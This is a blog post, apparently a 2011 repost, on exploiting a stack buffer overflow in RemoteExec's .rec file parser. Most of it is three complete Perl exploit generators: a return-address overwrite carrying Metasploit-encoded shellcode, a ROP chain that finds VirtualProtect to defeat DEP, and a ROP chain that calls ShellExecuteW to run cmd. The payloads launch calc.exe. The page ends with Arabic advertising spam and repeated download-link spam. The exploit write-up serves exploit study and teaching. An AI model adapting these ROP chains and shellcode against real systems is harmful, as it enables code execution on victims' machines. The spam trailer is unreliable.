Home > Vulnerability > RemoteExec Computers List Buffer Overflow ROP Exploit
RemoteExec Computers List Buffer Overflow ROP Exploit
Posted on 7 November 2011 by c0decstuff
In this post I’ll be writing about a ROP (Return Object Programming)  exploit that I had recently developed for a vulnerability I had  discovered in an application called “RemoteExec”. The vulnerability is  caused when opening a .rec file containing an overly long line  triggering a stack-based buffer overflow. It was first published in  March 2010 reported in version 4.04 and fixed in version 4.05. Since  then a number of later versions have been released. This exploit is  being released for educational purposes only.
For this vulnerability the offsets are
[BUFFER x 3072 bytes] + [RET] + [5224 bytes] + [NSEH] + [SEH] + [BUFFER]
In this exploit I will be taking control via the return address. The  exploit below needs no explanation as this should work on any Windows  operating system not supporting hardware DEP (data execution  prevention). The return address in this case points to instruction ‘push  esp # ret’ taken from the RemoteExec.exe executable.
my $file = "exp_calcshell.rec";
my $junk1 = "\x41" x 3072;
my $junk2 = "\x42" x 4;
#
# 0x00432360 : push esp # ret | startnull,asciiprint,ascii {PAGE_EXECUTE_READ}
# ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.0.4.0my $eip = pack ('V',0x00432360);# ruby msfpayload windows/exec CMD=calc exitfunc=process R # | ruby msfencode -e x86/call4_dword_xor -b '\x09\x0a\x0b\x0c\x0d\x1a\x20' -t perl
# [*] x86/call4_dword_xor succeeded with size 220 (iteration=1)
#
my $shellcode = "\x31\xc9\x83\xe9\xcf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76" . "\x0e\x95\x23\xb1\x46\x83\xee\xfc\xe2\xf4\x69\xcb\x38\x46" . "\x95\x23\xd1\xcf\x70\x12\x63\x22\x1e\x71\x81\xcd\xc7\x2f" . "\x3a\x14\x81\xa8\xc3\x6e\x9a\x94\xfb\x60\xa4\xdc\x80\x86" . "\x39\x1f\xd0\x3a\x97\x0f\x91\x87\x5a\x2e\xb0\x81\x77\xd3" . "\xe3\x11\x1e\x71\xa1\xcd\xd7\x1f\xb0\x96\x1e\x63\xc9\xc3" . "\x55\x57\xfb\x47\x45\x73\x3a\x0e\x8d\xa8\xe9\x66\x94\xf0" . "\x52\x7a\xdc\xa8\x85\xcd\x94\xf5\x80\xb9\xa4\xe3\x1d\x87" . "\x5a\x2e\xb0\x81\xad\xc3\xc4\xb2\x96\x5e\x49\x7d\xe8\x07" . "\xc4\xa4\xcd\xa8\xe9\x62\x94\xf0\xd7\xcd\x99\x68\x3a\x1e" . "\x89\x22\x62\xcd\x91\xa8\xb0\x96\x1c\x67\x95\x62\xce\x78" . "\xd0\x1f\xcf\x72\x4e\xa6\xcd\x7c\xeb\xcd\x87\xc8\x37\x1b" . "\xff\x22\x3c\xc3\x2c\x23\xb1\x46\xc5\x4b\x80\xcd\xfa\xa4" . "\x4e\x93\x2e\xd3\x04\xe4\xc3\x4b\x17\xd3\x28\xbe\x4e\x93" . "\xa9\x25\xcd\x4c\x15\xd8\x51\x33\x90\x98\xf6\x55\xe7\x4c" . "\xdb\x46\xc6\xdc\x64\x25\xf4\x4f\xd2\x46";
#
my $payload = $junk1 . $eip . $junk2 . $shellcode;
print "Payload size : " . length($payload) . "\n"; open($FILE,">$file"); print $FILE $payload; close($FILE);
print "REC File $file Created successfully\n";
To run this exploit on a Windows 7 OS which has ASLR and supports  hardware DEP would still work as the return address is taken from the  binary itself (RemoteExec.exe) which is not compiled to use ALSR and  DEP. Also by default Windows 7 DEP mode is set to “Optin” which means it  only protects essential Windows programs and services.
If DEP was set for “OptOut” or “AlwaysOn” then this exploit would  fail. So this is our challenge in building a reliable ROP exploit by
1. Calling an API to disable DEP or make our stack code executable
2. Using all instructions from RemoteExec.exe i.e. ROP gadgets as this binary does not support ASLR.
2. Using all instructions from RemoteExec.exe i.e. ROP gadgets as this binary does not support ASLR.
Using VirtualProtect API
For this exploit I will be using the VirtualProtect API to change the  access protection of memory in the calling process and use the PUSHAD  technique to push our register values in the stack before calling our  API. Our registers will need to contain values required for the  VirtualProtect parameters.
EDI – ROP NOP (RETN)
ESI – ptr to VirtualProtect()
EBP – ReturnTo (ptr to jmp esp)
ESP – lPAddress (automatic)
EBX – Size
EDX – NewProtect (0×40)
ECX – lpOldProtect (Writable ptr)
EAX – NOP (0×90909090)
ESI – ptr to VirtualProtect()
EBP – ReturnTo (ptr to jmp esp)
ESP – lPAddress (automatic)
EBX – Size
EDX – NewProtect (0×40)
ECX – lpOldProtect (Writable ptr)
EAX – NOP (0×90909090)
The values we can place in our registers using ROP gadgets outputted  from mona.py script. To call VirtualProtect I was hoping to find a  pointer in the IAT (Imported address table) which I viewed using IDA Pro  Free but unfortunately was unsuccessful.
If I did find a pointer then I would have been able to use this  pointer to VirtualProtect as pointers in IAT would be static and would  not change. Using the VirtualProtect pointer address from Windows 7  kernel32.dll library would be pretty useless as in the next OS reboot  the address would change due to Windows libraries compiled to use ASLR.
Fortunately looking down the near the bottom of our process stack  after setting a breakpoint on our return to stack return address we see a  pointer to an address in Kernel32.dll. What we need to do now is to go  all the way down using ROP gadgets and copy this pointer value, do some  calculations to obtain our VirtualProtect address.
In the exploit below I have laid it out on the order how PUSHAD  pushes the registers onto the stack. The register value of interest  would be ESI which after its ROP chain will end up containing a pointer  to VirtualProtect.
my $file = "exp_calcvirtualprotectdeprop.rec";
my $junk1 = "\x41" x 3072;
my $junk2 = "\x42" x 4; # compensate 4 bytes
my $nops = "\x90" x 30;
my $eip   = pack('V',0x00469038);      # RETN - return to stack#
# EDI -> RETN
#
my $rop=pack('V',0x00478102);          # POP EDI (ROP NOP)
$rop .= pack('V',0x00469038);          # RETN#
# ESI -> VirtualProtect()
#
#  Copy ESI to EAX
#
$rop .= pack('V',0x0047b6fd);          # ADD EAX,ESI # POP ESI # RETN
$rop .= pack('V',0x00469038);          # RETN - Compensate# # EAX current value 0x0012EA70. Has to be 0x0012FF8C which is our kernel32 # pointer. We need to add 0x151C or 5404 bytes to get to our pointer. # This value needs to be checked that it doesnt change after boot. This # distance is the same after reboots both for Windows 7 and XP. # # 0012FF8C |77121114 RETURN to kernel32.77121114 (77121114 will change at boot) # # The below chain will keep adding to EAX to end pointing to 0x0012FF8C #
$rop .= pack('V',0x00479eec);          # ADD EAX,100 # POP EBP # RETN
$rop .= pack('V',0x41414141);          # Compensate
$rop .= pack('V',0x00479eec);          # ADD EAX,100 # POP EBP # RETN
$rop .= pack('V',0x41414141);          # Compensate
$rop .= pack('V',0x00479eec);          # ADD EAX,100 # POP EBP # RETN
$rop .= pack('V',0x41414141);          # Compensate
$rop .= pack('V',0x00479eec);          # ADD EAX,100 # POP EBP # RETN
$rop .= pack('V',0x41414141);          # Compensate
$rop .= pack('V',0x00479eec);          # ADD EAX,100 # POP EBP # RETN
$rop .= pack('V',0x41414141);          # Compensate
$rop .= pack('V',0x00479eec);          # ADD EAX,100 # POP EBP # RETN
$rop .= pack('V',0x41414141);          # Compensate
$rop .= pack('V',0x00479eec);          # ADD EAX,100 # POP EBP # RETN
$rop .= pack('V',0x41414141);          # Compensate
$rop .= pack('V',0x00479eec);          # ADD EAX,100 # POP EBP # RETN
$rop .= pack('V',0x41414141);          # Compensate
$rop .= pack('V',0x00479eec);          # ADD EAX,100 # POP EBP # RETN
$rop .= pack('V',0x41414141);          # Compensate
$rop .= pack('V',0x00479eec);          # ADD EAX,100 # POP EBP # RETN
$rop .= pack('V',0x41414141);          # Compensate
$rop .= pack('V',0x00479eec);          # ADD EAX,100 # POP EBP # RETN
$rop .= pack('V',0x41414141);          # Compensate
$rop .= pack('V',0x00479eec);          # ADD EAX,100 # POP EBP # RETN
$rop .= pack('V',0x41414141);          # Compensate
$rop .= pack('V',0x00479eec);          # ADD EAX,100 # POP EBP # RETN
$rop .= pack('V',0x41414141);          # Compensate
$rop .= pack('V',0x00479eec);          # ADD EAX,100 # POP EBP # RETN
$rop .= pack('V',0x41414141);          # Compensate
$rop .= pack('V',0x00479eec);          # ADD EAX,100 # POP EBP # RETN
$rop .= pack('V',0x41414141);          # Compensate
$rop .= pack('V',0x00479eec);          # ADD EAX,100 # POP EBP # RETN
$rop .= pack('V',0x41414141);          # Compensate
$rop .= pack('V',0x00479eec);          # ADD EAX,100 # POP EBP # RETN
$rop .= pack('V',0x41414141);          # Compensate
$rop .= pack('V',0x00479eec);          # ADD EAX,100 # POP EBP # RETN
$rop .= pack('V',0x41414141);          # Compensate
$rop .= pack('V',0x00479eec);          # ADD EAX,100 # POP EBP # RETN
$rop .= pack('V',0x41414141);          # Compensate
$rop .= pack('V',0x00479eec);          # ADD EAX,100 # POP EBP # RETN
$rop .= pack('V',0x41414141);          # Compensate
$rop .= pack('V',0x00479eec);          # ADD EAX,100 # POP EBP # RETN
$rop .= pack('V',0x41414141);          # Compensate#
#  Need to add 28 bytes more to get 5404 bytes
#
$rop .= pack('V',0x004481c4) x 2;      # ADD EAX,0C # RETN
$rop .= pack('V',0x00474b27) x 4;      # INC EAX # RETN
#
#  Now we take the pointer at 0x0013FFC4 and copy to EAX
#
$rop .= pack('V',0x00466de3);          # MOV EAX,DWORD PTR DS:[EAX] # RETN 
#
#  EAX now contains pointer to kernel32.dll 0x77121114 and need to subtract
#  0xC049 or 49225 bytes to point to VirtualProtect in this boot as the
#  address of VirtualProtect is 0x771150cb in this instance.
#  0x77121114 - 0x771150cb = 0xC049 (49225 bytes)#  Place 0xC049 in ECX
#
$rop .= pack('V',0x0046c000);          # POP ECX # RETN
$rop .= pack('V',0x0000C049);          # 0xC049
#
#  Subtracting
#
$rop .= pack('V',0x00469c24);          # SUB EAX,ECX # RETN
#
#  Placing VirtualProtect pointer in ESI
#
$rop .= pack('V',0x00459d14);          # PUSH EAX # POP ESI # RETN 04
#
# EBP -> ReturnTo
#
$rop .= pack('V',0x0046b803);          # POP EBP # RETN
$rop .= pack('V',0x41414141);          # junk, compensate
$rop .= pack('V',0x00432360);          # ptr to 'push esp # ret'
#
# EBX -> Size
#
$rop .= pack('V',0x0041a80e);          # POP EBX # RETN
$rop .= pack('V',0x000001f4);          # Size to mark as executable 500 bytes
#
# EDX -> NewProtect (0x40)
#
$rop .= pack('V',0x00469787);          # POP EDX # RETN
$rop .= pack('V',0x00000040);          # newProtect (0x40)
#
# ECX -> lpOldProtect (Writable ptr)
#
$rop .= pack('V',0x0046c000);          # POP ECX # RETN
$rop .= pack('V',0x0048d000);          # RW pointer (lpOldProtect)
#
# EAX -> NOP (0x90909090)
#
$rop .= pack('V',0x0046d241);          # POP EAX # RETN
$rop .= pack('V',0x90909090);          # NOPS
#
# PUSHAD
#
$rop .= pack('V',0x00478b8c);          # PUSHAD # RETN
## ruby msfpayload windows/exec CMD=calc exitfunc=process R # | ruby msfencode -e x86/call4_dword_xor -b '\x09\x0a\x0b\x0c\x0d\x1a\x20' -t perl
# [*] x86/call4_dword_xor succeeded with size 220 (iteration=1) # my $shellcode = "\x31\xc9\x83\xe9\xcf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76" . "\x0e\x95\x23\xb1\x46\x83\xee\xfc\xe2\xf4\x69\xcb\x38\x46" . "\x95\x23\xd1\xcf\x70\x12\x63\x22\x1e\x71\x81\xcd\xc7\x2f" . "\x3a\x14\x81\xa8\xc3\x6e\x9a\x94\xfb\x60\xa4\xdc\x80\x86" . "\x39\x1f\xd0\x3a\x97\x0f\x91\x87\x5a\x2e\xb0\x81\x77\xd3" . "\xe3\x11\x1e\x71\xa1\xcd\xd7\x1f\xb0\x96\x1e\x63\xc9\xc3" . "\x55\x57\xfb\x47\x45\x73\x3a\x0e\x8d\xa8\xe9\x66\x94\xf0" . "\x52\x7a\xdc\xa8\x85\xcd\x94\xf5\x80\xb9\xa4\xe3\x1d\x87" . "\x5a\x2e\xb0\x81\xad\xc3\xc4\xb2\x96\x5e\x49\x7d\xe8\x07" . "\xc4\xa4\xcd\xa8\xe9\x62\x94\xf0\xd7\xcd\x99\x68\x3a\x1e" . "\x89\x22\x62\xcd\x91\xa8\xb0\x96\x1c\x67\x95\x62\xce\x78" . "\xd0\x1f\xcf\x72\x4e\xa6\xcd\x7c\xeb\xcd\x87\xc8\x37\x1b" . "\xff\x22\x3c\xc3\x2c\x23\xb1\x46\xc5\x4b\x80\xcd\xfa\xa4" . "\x4e\x93\x2e\xd3\x04\xe4\xc3\x4b\x17\xd3\x28\xbe\x4e\x93" . "\xa9\x25\xcd\x4c\x15\xd8\x51\x33\x90\x98\xf6\x55\xe7\x4c" . "\xdb\x46\xc6\xdc\x64\x25\xf4\x4f\xd2\x46"; #
my $payload = $junk1 . $eip . $junk2 . $rop . $nops . $shellcode;
print "Payload size : " . length($payload) . "\n"; open($FILE,">$file"); print $FILE $payload; close($FILE);
print "REC File $file Created successfully\n";
If we were to run this exploit in Windows XP even though these steps  are not required as XP doesn’t support ASLR the distance to our kernel  pointer would be the same (5404 bytes) but our distance to  VirtualProtect pointer from our kernel pointer would be different so the  exploit would fail. For Windows 7 we need to subtract 0xC049 whereas in  Windows XP would be 0x155A3.
You might be wondering where did I get this magic value of 0xC049?  Well even though our kernel pointer and VirtualProtect API values change  every time at boot, subtracting them the sum would always be the same.
Below is a table of addresses at each boot
| Stack address | Kernel pointer | VirtualProtect | Magic value | 
| 0012FF8C | 76E01114 | 76df50cb | C049 (49225 bytes) | 
| 0012FF8C | 76631114 | 766250cb | C049 (49225 bytes) | 
| 0012FF8C | 768E1114 | 768d50cb | C049 (49225 bytes) | 
| 0012FF8C | 77121114 | 771150cb | C049 (49225 bytes) | 
Using ShellExecuteW API
What if we cannot obtain our kernel pointer from the stack? Well we  can check all the pointers to API’s in the IAT and see what we can use.  One API that stood out for me was ShellExecuteW. This is perfect to use  for our code execution.
This API uses 6 parameters and again we can use the PUSHAD technique  to push most of the parameter values in the stack. If coding in C you  would write something like this:
ShellExecuteW(NULL, L"open", L"calc.exe", NULL, NULL, SW_SHOWNORMAL);
Checking the ShellExecuteW API we can see that most of the parameters  can be set to NULL thus writing our ROP exploit that much easier.
HINSTANCE ShellExecute( __in_opt HWND hwnd, __in_opt LPCTSTR lpOperation, __in LPCTSTR lpFile, __in_opt LPCTSTR lpParameters, __in_opt LPCTSTR lpDirectory, __in INT nShowCmd );
So when pushing the values in the stack using PUSHAD the only  pointers we need to work on are ECX and EAX. ECX will need to point to  cmd and EAX to our chained commands. The strings i.e. cmd and our  chained commands has to be in unicode as the API we are calling supports  unicode only.
EDI – ROP NOP (RETN)
ESI – ROP NOP (RETN)
EBP – ptr to ShellExecuteW()
ESP – top of stack
EBX – hWnd = NULL
EDX – Operation = NULL
ECX – FileName = “cmd”
EAX – Parameters = “///////////////////ccalc.exe&calc.exe
ESI – ROP NOP (RETN)
EBP – ptr to ShellExecuteW()
ESP – top of stack
EBX – hWnd = NULL
EDX – Operation = NULL
ECX – FileName = “cmd”
EAX – Parameters = “///////////////////ccalc.exe&calc.exe
DefDir = NULL
IsShown = 0
IsShown = 0
my $file = "exp_calcshellexecuterop.rec";
my $junk1 = "\x41" x 3072;
my $junk2 = "\x42" x 4; # compensate 4 bytes
my $eip = pack('V',0x00469038);       # RETN - return to stack#
# ESP -> ECX (save esp in ecx for later use)
#
my $rop=pack('V',0x0047b6fd);         # ADD EAX,ESI # POP ESI # RETN
$rop .= pack('V',0x00469038);         # RETN - Compensate
$rop .= pack('V',0x00462a47);         # PUSH ESP # ADD BYTE PTR DS:[EAX],AL#                                     POP ECX # RETN
#
# EDI -> RETN
#
$rop .= pack('V',0x00478102);         # POP EDI (ROP NOP)
$rop .= pack('V',0x00469038);         # RETN
#
# ESI -> RETN
#
$rop .= pack('V',0x0042807d);         # POP ESI (ROP NOP)
$rop .= pack('V',0x00469038);         # RETN
#
# EBP -> ShellExecuteW()
#
$rop .= pack('V',0x0046d241);         # POP EAX # RETN
$rop .= pack('V',0x00481380);         # IAT Pointer to ShellExecuteW()$rop .= pack('V',0x00466de3);         # MOV EAX,DWORD PTR DS:[EAX] # RETN  
$rop .= pack('V',0x0046f2bb);         # XCHG EAX,EBP # ADD EAX,B70F0000 # RETN
#
# EBX -> 00000000 -> hWnd = NULL
#
$rop .= pack('V',0x0047804f);         # POP EBX # RETN
$rop .= pack('V',0xFFFFFFFF);         # <- will be put in EBX
$rop .= pack('V',0x00466cc5);         # INC EBX # XOR EAX,EAX # RETN
#
# EDX -> 00000000 -> Operation = NULL
#
$rop .= pack('V',0x00468d8c);         # XOR EDX,EDX # RETN 
#
# ECX -> ptr to filename which is cmd
#
$rop .= pack('V',0x0045b660);         # MOV EAX,ECX # RETN
$rop .= pack('V',0x0046852b);         # INC EAX # ADD AL,50 # RETN
$rop .= pack('V',0x00455e49) x 14;    # INC EAX # RETN
$rop .= pack('V',0x0046852b);         # INC EAX # ADD AL,50 # RETN
$rop .= pack('V',0x0042df81);         # PUSH EAX # ADD AL,5B # POP ECX # RETN 08
$rop .= pack('V',0x00469038) x 3;     # RETN - Compensate
#
# EAX -> ptr to parameters
#
$rop .= pack('V',0x0045b660);         # MOV EAX,ECX # RETN
$rop .= pack('V',0x004481c4);         # ADD EAX,0C # RETN
#
# PUSHAD
#
$rop .= pack('V',0x00478b8c);         # PUSHAD # RETN
#
# Remaining arguments
#
my $args=pack('V',0x00000000);        # DefDir = NULL
$args .= pack('V',0x00000000);        # IsShown = 0
#my $padding = "\x43" x 24; # # cmd in unicode # my $cmd = "\x63\x00\x6d\x00\x64\x00\x00\x00"; # # / in unicode # my $nops = "\x2f\x00\x2f\x00\x2f\x00\x2f\x00\x2f\x00\x2f\x00\x2f\x00\x2f\x00". "\x2f\x00\x2f\x00\x2f\x00\x2f\x00\x2f\x00\x2f\x00\x2f\x00\x2f\x00". "\x2f\x00\x2f\x00\x2f\x00\x2f\x00\x2f\x00\x2f\x00\x2f\x00\x2f\x00". "\x2f\x00\x2f\x00\x2f\x00\x2f\x00\x2f\x00\x2f\x00\x2f\x00\x2f\x00". "\x2f\x00\x2f\x00\x2f\x00\x2f\x00\x2f\x00\x2f\x00\x2f\x00\x2f\x00". "\x2f\x00\x2f\x00\x2f\x00\x2f\x00\x2f\x00\x2f\x00\x2f\x00\x2f\x00". "\x2f\x00\x2f\x00\x2f\x00\x2f\x00\x2f\x00\x2f\x00\x2f\x00\x2f\x00". "\x2f\x00\x2f\x00\x2f\x00\x2f\x00\x2f\x00\x2f\x00\x2f\x00\x2f\x00". "\x2f\x00\x2f\x00\x2f\x00\x2f\x00\x2f\x00\x2f\x00\x2f\x00\x2f\x00". "\x2f\x00\x2f\x00\x2f\x00\x2f\x00\x2f\x00\x2f\x00\x2f\x00\x2f\x00"; # # /ccalc.exe&calc.exe in unicode # my $parameters = "\x2f\x00\x63\x00\x63\x00\x61\x00\x6c\x00\x63\x00\x2e\x00". "\x65\x00\x78\x00\x65\x00\x26\x00\x63\x00\x61\x00\x6c\x00\x63\x00". "\x2e\x00\x65\x00\x78\x00\x65\x00"; # my $payload = $junk1.$eip.$junk2.$rop.$args.$padding.$cmd.$nops.$parameters;
print "Payload size : " . length($payload) . "\n"; open($FILE,">$file"); print $FILE $payload; close($FILE);
print "REC File $file Created successfully\n";
So our API parameters would look like this below where here we are executing two calculators.
ShellExecuteW(NULL, NULL, L"cmd", L"/ccalc.exe&calc.exe", NULL, 0);
The interesting thing in this case is that the offset to “Parameters”  parameter is not always precise for Windows XP and Windows 7 so I have  used forward slashes which acts as nops so it would look something like  this below making it work for both operating systems.
ShellExecuteW(NULL, NULL, L"cmd", L"/////////////ccalc.exe&calc.exe", NULL, 0);
I would like to thank to Peter Van Eeckhoutte’s superb tutorial  “Chaining DEP with ROP – the Rubik’s[TM] Cube” and the Corelan team for  the mona.py script. Without these two materials learning ROP  exploitation would have been a lot harder. I recommend reading this  tutorial as it explains the theory behind ROP and other techniques that  can be used to exploit.
Finally when starting to write an exploit always remove any bad  characters before anything else as it will save time in the long run. In  this exploit the bad characters were ‘\x09\x0a\x0b\x0c\x0d\x1a\x20′  which cannot be used at all in our REC file. If we were only trying to  exploit in Windows XP then just calling the VirtualProtect API address  would normally work which is 0x7c801ad4 but as you can see in this case  it contains 0x1a which would break the exploit. One way to get round  this is to place a value not containing 0x1a and do ADD/SUB ROP gadgets  to get to VirtualProtect.
References:
http://secunia.com/advisories/38733/
http://blog.isdecisions.com/post/452928936/security-update-for-remoteexec
http://msdn.microsoft.com/en-us/library/windows/desktop/bb762153(v=vs.85).aspx
https://www.corelan.be/index.php/2010/06/16/exploit-writing-tutorial-part-10-chaining-dep-with-rop-the-rubikstm-cube/
http://blog.isdecisions.com/post/452928936/security-update-for-remoteexec
http://msdn.microsoft.com/en-us/library/windows/desktop/bb762153(v=vs.85).aspx
https://www.corelan.be/index.php/2010/06/16/exploit-writing-tutorial-part-10-chaining-dep-with-rop-the-rubikstm-cube/
Source:GreyHatHacker
Category Article Exploits, Vulnerability
2 Responses to “c0decstuff”
Total Pageviews
Labels
- Android (1)
- Aplication (14)
- ARP (1)
- Backdoored (2)
- Browser (1)
- Cloud (1)
- Exploitation (1)
- Exploits (7)
- Facebook (2)
- forensics (3)
- Hacking (11)
- Hijacking (1)
- Honeypot (1)
- HTML5 (1)
- ios (2)
- Jailbreak (2)
- Linux (1)
- Malware (5)
- metasploit (2)
- Meterpreter (1)
- Movie (1)
- Networking (1)
- News (2)
- password attack (2)
- Penetration Test (2)
- Python (1)
- reverse engineering (1)
- Rootkits (1)
- Security (12)
- shellcode (2)
- Stuxnet/Duqu (2)
- Uncategories (1)
- Virus (1)
- Vulnerability (8)
- Web (5)
- Wifi (1)
- Windows (5)
Blog Archive
- 
▼ 
11
(51)
- 
▼ 
Nov
(12)
- How to Fix iOS 5 Errors
- Jailbreak iOS 5.0/iOS 5.0.1 Using Ac1dSn0w
- Anatomy of Self Inflicted Javascript Injection "fa...
- Understanding Private Clouds
- HTML5, Local Storage, and XSS
- Honey Potting for MS11-083
- Duqu Installer Contained Microsoft Word Zero-Day E...
- The History of Computer Viruses
- Memory Forensics
- Hijacking Google Analytics
- RemoteExec Computers List Buffer Overflow ROP Exploit
- Jailbreak iOS 5.0.1 On Windows Using Sn0wbreeze 2....
 
 
- 
▼ 
Nov
(12)
Friendlist
Security Resources
- 
- 
- 
This feed contains no entries
- 
- 
- 
- 
- 
- 
- 
- 
- 
 
افضل شركات نقل العفش في منطقة المدينة المنورة تلك الشركات التي تقدم افضل الخدمات الخاصة بالمنزل كما في افضل شركة نقل اثاث بالمدينه المنوره المضمونة وتلك الخدمات تكون بمنتهى الدقة والاحترافية وتمتلك سيارات مجهزة خصيصا لنقل العفش من مكان الى مكان آخر بعد تنظيف المكان الجديد من قبل ارخص شركات تنظيف شقق بالمدينة المنورة محترفة وذلك قبل نقل العفش اليها لكي يتم ترتيب عفشك على نظافة وقد تقوم في الحال اقوى شركات تنظيف الخزانات بالمدينه المنوره بتنظيف وتعقيم لخزان المياه خاصتك لضمان سلامة ونقاء مياهك وايضا تعمل افضل شركة تنظيف موكيت بالمدينه المنوره بتنظيف وغسيل المفروشات والكنب والموكيت والستائر وتعقيم المنزل كاملا وتقدم شركة مكافحة الصراصير بالمدينة المنورة خدمات رش المبيدات الحشرية لكي يتم تعقيم المنزل كاملا من البكتيريا والجراثيم الضارة
Remoteexec Computers List Buffer Overflow Rop Exploit >>>>> Download Now
>>>>> Download Full
Remoteexec Computers List Buffer Overflow Rop Exploit >>>>> Download LINK
>>>>> Download Now
Remoteexec Computers List Buffer Overflow Rop Exploit >>>>> Download Full
>>>>> Download LINK 8Z